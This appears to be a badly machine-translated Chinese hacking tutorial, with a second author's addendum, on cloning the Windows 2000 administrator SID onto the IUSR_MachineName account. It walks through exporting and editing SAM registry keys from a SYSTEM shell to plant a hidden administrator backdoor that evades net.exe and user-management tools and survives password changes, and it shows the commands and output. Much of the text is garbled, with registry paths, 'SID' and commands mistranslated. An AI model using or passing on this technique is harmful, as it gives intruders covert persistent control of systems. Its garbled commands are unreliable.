admin 克隆windows2000管理员帐号
首先让大家了解一个概念,在Windows 2000和Windows NT中,默认管理员帐号的SID固定为500(0x1f4),所以我们可以用机器中已经存在的帐号克隆SID为500的帐号。这里我们选择的账号是IUSR_MachineName(当然为了增强隐蔽性,我们选择了这个账号,所有用户都可以使用下面的方法,但是这个用户比较常见),测试环境是Windows 2000 Server。
运行一个cmdshell of System(http://www.sometips.com/tips/scripts/173.htm或Http://www . some tips . com/soft/PSU . exe),然后在cmdshell中运行regedit/edam . reghkey _ local _ machine \ Sam \ Sam \ domains \ account \ users \ 00001 F4,这样我们就可以导出SID为500的管理员帐户的信息,然后编辑adam.reg文件。将adam.reg文件-[HKEY _本地_机器\山姆\山姆\域\帐户\用户\ 00001f4]第三行最后一个' 1F4 '修改为IUSR _机器名的SID(大部分机器的用户SID为0x3E9。如果初始安装时计算机上没有安装IIS,并且在您创建自己的帐户后安装IIS时可能不是这个值),请在根目录中更改“1F4”。然后执行Regedit /s adam.reg来导入reg文件。
那就跑。
net用户IUSR_MachineName有时
修改IUSR_MachineName的密码(使用14位密码,越像IUSR_MachineName的密码越好)
好了,你完成了...
这样,我们就拥有了与默认管理员相同的桌面和配置文件。.....
并且,当我们运行net localgroup administrators时,看看结果:
C:\ >网络本地组管理员
别名管理员
注释管理员拥有对计算机/域的完全和无限制的访问权限
成员
-
管理人
命令成功完成。
再次查看USER2SID的输出:
C:\ >用户2标识管理员
电话:1004336348-1078145449-854245398-500
子权限的数量是5
域是未知的
内存中SID的长度为28字节
SID的类型是SidTypeUser
C:\>user2sid iusr_machinename
电话:1004336348-1078145449-854245398-1001
子权限的数量是5
域是未知的
内存中SID的长度为28字节
类型sid是sidtypeuser
我想,管理员再聪明,也看不出有什么不同...此外,无论管理员更改了什么密码,我仍然可以使用IUSR_MachineName登录,密码是Sometips...(没有一个战士级别的管理员喜欢频繁的把IUSR_MachineName改成其他名字。)
这是RootKit吗?...
附:
1.感谢丁丁为重装OS付出的代价。...
2.以上方法导致的任何系统故障与我无关,我不提供技术支持。...
-
丁的补充与完善
很多人提到用管理工具管理用户后,可以发现IUSR_MachineName升级了。
现在给出解决方案。
方法同上,但这次修改较多。也就是
这次要导出两个关键内容:
一个是亚当提到的。
regedit/e Adam . reg HKEY _ LOCAL _ MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ 000001 F4
然后另外一个就是你需要修改那个账户的值。
regedit/e iusr . reg HKEY _ LOCAL _ MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ 000003 e9
然后像adam提到的那样修改adam.reg。
"将adam.reg文件-[HKEY本地机器\萨姆\萨姆\域\帐户\用户\ 00001f4]第三行的最后一个' 1F4 '修改为IUSR机器名的SID "
现在,您必须从iusr.reg文件中复制内容。
即iusr.reg文件中的“' V'=hex:0”从iusr.reg文件的开头复制到结尾。
然后替换adam.reg中相同位置的零件
最后使用
regedit /s adam.reg
导入Reg文件。
呵呵,别忘了把这个IUSR_MachineName的密码改了。
呵呵,好了,大功告成。
现在,IUSR_MachineName帐户拥有管理员权限,但是您使用net.exe和
管理工具中的用户管理将看不到任何痕迹,即使您查看您所属的组和用户。
它们和改造前没有区别。
0条评论